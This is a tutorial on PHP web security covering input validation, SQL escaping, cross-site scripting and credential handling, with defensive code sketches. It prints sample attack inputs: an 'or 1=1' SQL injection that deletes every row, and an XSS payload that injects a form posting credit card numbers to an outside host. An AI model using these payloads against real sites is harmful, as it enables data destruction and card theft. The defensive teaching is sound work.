Trust is everything in this day and age. You have to trust
a lot of people, from the guy who gives you directions to your
local plumber. After all, you're not always the authority. However, when
developing applications for the web, you must assume the
role of authority. Otherwise, the user will assume the role, which is a big gamble:
total data integrity, data corruption, or diversion of data -- if the
user is the authority, you don't know what the results will be.
We blame a lot of problems on "bad code". However, bad code isn't
necessarily written with malicious intent; good code can go bad through simple
misunderstandings and misuse of technologies. Three basic
steps can be taken to avoid creating bad code. The first step is
ensuring that you can trust your input. The next step is manipulating that input
data carefully. The final step is providing the appropriate people with
secure, reliable access to that data.
Verify That Your Input Is Correct
Never trust the input you receive from someone else. You want your data to
have perfect integrity, within the limits that you establish. If you
write a routine that saves someone's address to your
database, don't trust your routine to magically fix user error. Only you can make that happen.
Let's write some quick code to save those addresses:
<?php
function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
$stmt=OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
OCIExecute($stmt);
}
?>
So what happens if someone leaves the ZIP code out?
What if they put "pr0nd00d" as their ZIP code? Do not trust your input.
Some might argue that these checks should be done before this function.
Well, what if your co-worker, Billy Bob, reuses this function? Now he
has to do the checks too. And don't trust he'll do it, either. Billy
Bob is a lazy man, and not too smart in the first place.
So let's define a function to make sure the ZIP code is right. After
all, my zip code is not "I like cheese."
<?php
function validZipCode($zip) {
// ereg() was removed in PHP 7; preg_match() returns 1 on a match and 0 otherwise.
return(preg_match('/^[0-9]{5}(-[0-9]{4})?\z/',$zip));
}
?>
The validZipCode() function takes a ZIP code and does a regular
expression match against it. If $zip consists of 5 digits, with an optional
dash and 4-digit extension, it returns 1. Otherwise it returns 0. Now, let's integrate
it with our current function.
<?php
function saveAddress($dbh,$firstName,$lastName,$streetAddress,$city,$zip) {
if(!validZipCode($zip))
return(0);
$stmt=OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
OCIExecute($stmt);
return(1);
}
?>
Now our current function requires a valid ZIP code. It won't accept a
blank one, nor a non-USA one. (Note that our function doesn't simply
require a non-blank string -- that would be A Bad Thing(tm).) If
a valid ZIP isn't passed, our function returns 0. But wait...we can rework
the logic so that when validZipCode() returns 0, an array or string
can be returned with a more descriptive error.
<?php
// $errors must already be an array, e.g. $errors=array();
if(!validZipCode($zip))
array_push($errors,"Invalid zip code.");
if(!validStreetAddress($streetAddress))
array_push($errors,"Invalid address.");
?>
Etc...
Adding the remaining validation functions is an exercise left to the reader. Some checks may not be
economically or technologically feasible,
as you cannot always afford to verify information beyond a certain point.
For example, it would be too slow to confirm every bit of the input from the
one hundred addresses per second you get. However, a simple check like the one
outlined above makes it MUCH harder to end up with data that
doesn't make sense. After all, we know that valid U.S. ZIP
codes are numeric and how long they can be, so why accept data that's
obviously wrong?
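As a minimal sketch of the error-collecting idea above: the ZIP check is a preg_match() version of the article's pattern, while validStreetAddress() and addressErrors() are hypothetical names, and the street rule (1 to 100 printable ASCII characters, at least one letter or digit) is only a placeholder assumption, not a real postal rule.

```php
<?php
// PCRE version of the article's ZIP check: 5 digits, optional dash plus 4 digits.
function validZipCode($zip) {
    return is_string($zip) && preg_match('/^[0-9]{5}(-[0-9]{4})?\z/', $zip) === 1;
}

// Hypothetical placeholder rule: 1-100 printable ASCII characters,
// containing at least one letter or digit.
function validStreetAddress($streetAddress) {
    return is_string($streetAddress)
        && preg_match('/^[\x20-\x7E]{1,100}\z/', $streetAddress) === 1
        && preg_match('/[A-Za-z0-9]/', $streetAddress) === 1;
}

// Collect every problem instead of stopping at the first one.
// An empty array means the input passed all checks.
function addressErrors($streetAddress, $zip) {
    $errors = array();
    if (!validZipCode($zip)) {
        $errors[] = "Invalid zip code.";
    }
    if (!validStreetAddress($streetAddress)) {
        $errors[] = "Invalid address.";
    }
    return $errors;
}
```

A caller such as saveAddress() could run addressErrors() first and touch the database only when the returned array is empty.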
Manipulating Your Input
This is a more subtle problem for those who may not fully understand
every detail of what they are doing. Good data manipulation is a matter
of watching what you do and how you do it, because this is where
hackers and crackers can have a field day.
In our original function, there is a statement:
<?php
OCIPrepare($dbh,"
Insert into addressBook
(firstName,lastName,streetAddress,city,zip)
values
('$firstName','$lastName','$streetAddress','$city','$zip')");
?>
Bob O'Connor is a candidate to have his address saved in our
addressBook table. The SQL string to be parsed now contains "...
('Bob','O'Connor', ...." You may see the error now. That single quote in
"O'Connor" needs to be escaped. The Oracle way is to turn "O'Connor"
into "O''Connor", by replacing each single apostrophe with two
apostrophes.
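The apostrophe doubling described above can be sketched in a few lines. oracleQuote() is a hypothetical helper name, and the sketch covers only the quoting rule the article mentions; it makes no claim to handle every character a given database might treat specially.

```php
<?php
// Hypothetical helper: wrap a value in single quotes and double any
// single quote inside it, so the database reads it as data, not as SQL.
function oracleQuote($value) {
    return "'" . str_replace("'", "''", $value) . "'";
}

// Build the values list for Bob O'Connor with every field quoted.
$sql = "insert into addressBook (firstName,lastName) values ("
     . oracleQuote("Bob") . "," . oracleQuote("O'Connor") . ")";
```

Where the database driver offers bind variables (OCI8's oci_bind_by_name(), for instance), passing the values separately from the SQL text avoids the quoting problem altogether.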
Bob O'Connor probably doesn't care how you deal with this situation,
but let's think about the hacker and/or cracker who will love you for a
statement like:
delete from addressBook where lastName=$lastname
What if $lastname="'' or 1=1"? Now our statement looks like:
delete from addressBook where lastName='' or 1=1
Everything in your address book has now been deleted. It is now time to
break out the 40gig backup tapes.
Just because one language (like PHP) can take your input without a
problem, don't assume that another language (like SQL) will happily accept the same
input. This is not a matter of coding for what you want to
happen: it is a matter of coding for what you don't want to happen.
Escape your characters if you are using more than one language interpreter.
If you are using PHP to evaluate dynamic PHP via eval(), don't assume
that the variables you use to construct the dynamic PHP will be
sane.
One more example. Here's a simple piece of HTML and PHP which does
something neat.
<?php
if($CC) {
save($CC);
header("Location: https://www.mystore.com/my.php");
exit();
}
?>
<form method="post" action="my.php">
Input your CC number to pay for your purchase.<br>
<input type="text" name="CC" value="<?php echo $CC; ?>"><br>
<input type="submit" value="Show me the money!">
</form>
A piece of code to save your credit card number, but with one faux pas:
I didn't check to be sure $CC is valid before trying to save! But
save($CC) should check to make sure it's getting valid input, as well.
Let's assume the spec for save($CC) is: if the $CC is valid, it is saved;
else, an error is returned. So let's change our code to correspond
with that spec.
<?php
if(save($CC)) {
header("Location: ....");
exit;
}
?>
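The spec above assumes save() can tell a plausible card number from garbage. The article does not say how; one common check, shown here purely as an assumption, is a digits-only test followed by the Luhn checksum. validCC() is a hypothetical name, and passing this check says nothing about whether the card actually exists.

```php
<?php
// Hypothetical helper: true only for 13-19 digit strings that pass
// the Luhn checksum. Anything else (blank, letters, markup) is rejected.
function validCC($cc) {
    if (!is_string($cc) || preg_match('/^[0-9]{13,19}\z/', $cc) !== 1) {
        return false;
    }
    $sum = 0;
    $double = false; // the rightmost digit is not doubled
    for ($i = strlen($cc) - 1; $i >= 0; $i--) {
        $digit = (int) $cc[$i];
        if ($double) {
            $digit *= 2;
            if ($digit > 9) {
                $digit -= 9;
            }
        }
        $sum += $digit;
        $double = !$double;
    }
    return $sum % 10 === 0;
}
```

A save() built along these lines would return an error as soon as validCC() fails, before any storage is attempted.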
So now if $CC is invalid, our little input tag does something cool. It
lets the user see and correct his mistake!
<input type="text" name="CC" value="<?php echo $CC; ?>">
Remember what I said about coding in one language to output to another?
This example is vulnerable to cross-site scripting. (This is when you
input your own script code as input to another program and the result
returned is a page that now does something else -- something the
programmer never intended.) A hacker/cracker might input the following for
$CC...watch the exact characters used:
"></form><form action=http://www.mycompetitor.com/haha.cgi>
Input your CC again for validation purposes:
<input name="CC"><input type=submit></form><!--
Don't worry how the person managed to fit all of this into our
program. Now our web page will look like this after PHP gets to it:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value=""></form><form
action=http://www.mycompetitor.com/haha.cgi>Input your CC again for validation
purposes: <input name="CC"><input type=submit></form><!--">
<input type="submit" value="Show me the money!">
</form>
This is a very simple hack and slash example, but our page will now
have two input fields. The first goes nowhere since the submit button
isn't within the <form></form> tags. The second sends the credit card
number to another site! The rest of the HTML is blanked out after the
second closing form tag. A quick and nasty hack, eh? We can beautify this
further, but the point here is to show that you should never trust your input. HTML
is taking input from PHP.
How to prevent this? A line before or during printing:
<?php
// Replace each double quote with its HTML entity so it cannot close the value attribute.
$CC=str_replace("\"","&quot;",$CC);
?>
Now if some evil person tries the above malicious code, or even a
simple:
"><input type="submit" value="DIE!
This will output:
<form method="post" action="my.php">
Input your CC number to pay for your purchase.
<input type="text" name="CC" value="&quot;><input
type=&quot;submit&quot; value=&quot;DIE!">
<input type="submit" value="Show me the money!">
</form>
Annoying to anyone who views it? Yes. Dangerous to your customers?
Definitely not. The value in the input field is practically garbage. In
fact, you might get a phone call about someone at haha@malicious.com
sending you such things. What you do to Mr. "haha" is entirely up to
you.
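Replacing the double quote handles the attack shown above. PHP's built-in htmlspecialchars() goes a step further and also converts <, >, & and (with ENT_QUOTES) the single quote. The sketch below assumes UTF-8 pages; attr() and ccInput() are hypothetical helper names.

```php
<?php
// Hypothetical helper: escape a value for use inside an HTML attribute.
function attr($value) {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Build the credit card input tag with the user's value safely escaped.
function ccInput($cc) {
    return '<input type="text" name="CC" value="' . attr($cc) . '">';
}
```

With this in place, the hostile value stays inside the value attribute as harmless text instead of becoming new tags.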
How To Access Your Data
Now all your code is proof against cross-site scripting and is saving proper data.
Time to make your site public, right? This is another time where you
should think twice. For example, your customers are logging into your site to use
your two-click purchase (patent pending) fork-in-a-box (patent pending)
e-commerce site. You do one of these for a front page:
<form method="get" action="account.php">
ID: <input type="text" name="id">
Password: <input type="password" name="password">
</form>
See the first problem? To submit to your account page, a URL is
constructed to pass the variables, like so:
http://www.forkinabox.com/account.php?id=me&password=ilikecheese
In the worst case scenario, the password is sent in plain text, saved
in the browser's history, sent to a proxy and saved in the proxy log,
and saved in the webserver's access log. Using the POST method
makes things a little (not much) more secure, but someone who is
persistent enough can even fake a form using the POST method.
Since we are using the GET method to get the variables into PHP in the
prior example, anyone can try an infinite number of IDs and passwords.
(Microsoft suffered this one with their passport system a while back.)
Instead of GET, use POST and read $_POST[] (named $HTTP_POST_VARS[] in old PHP versions) for information that is vital for
access or needs to be secure for other reasons. The rest of the time
you can use the GET method -- most of the time a search term doesn't
have to be kept secret.
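A minimal sketch of accepting credentials from a POST body only. readLogin() is a hypothetical name; the field names id and password come from the form above. This keeps the password out of URLs and logs, but it does nothing about sniffing or repeated guessing.

```php
<?php
// Hypothetical helper: return the submitted credentials only when they
// arrived via POST as non-empty strings; otherwise return null.
function readLogin($method, array $post) {
    if ($method !== 'POST') {
        return null; // ignore anything passed in the URL
    }
    if (!isset($post['id'], $post['password'])) {
        return null;
    }
    if (!is_string($post['id']) || !is_string($post['password'])) {
        return null; // reject array-valued fields such as id[]=x
    }
    if ($post['id'] === '' || $post['password'] === '') {
        return null;
    }
    return array('id' => $post['id'], 'password' => $post['password']);
}
```

In a page script, the call would typically be readLogin($_SERVER['REQUEST_METHOD'], $_POST), with the form's method attribute changed to "post".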
Since it is possible for someone in the network to be sniffing for
clear-text (non-encrypted) data, using https (SSL) will encrypt the remaining data to make
it more secure. It is possible to break this kind of
encryption, but at present it takes someone with a lot of
computing power to decrypt your data and fake input to your forms. [Insert
your favorite conspiracy theory here.]
But let's say that we want to be slick and bypass PHP. (That's the
reason why we're writing bad code, no?) Checking with JavaScript for
valid input or even a valid user and password has been done. But then what
happens when I turn off JavaScript?
Don't depend on JavaScript for anything more important than user
convenience. You can cache data with it, make pretty things with it, use it to do
fast checks for invalid data, but don't depend on JavaScript to get
proper input to your server. As soon as the user turns it off,
your authentication and data checking are out the door. You can
speed up the data checking and shave some processing time off the server,
but users can turn it off. I know I do!
This article may be in three parts, but it has one point in mind:
Never trust anything that you don't have control over. Don't trust the
input to your functions, the data used to generate pages, nor the
network. This means check your input when it comes in, clean the input for
further use, and access it in a sane (and maybe even secure) fashion.
The more authority you take, the less chance the user can be malicious.
-- Spencer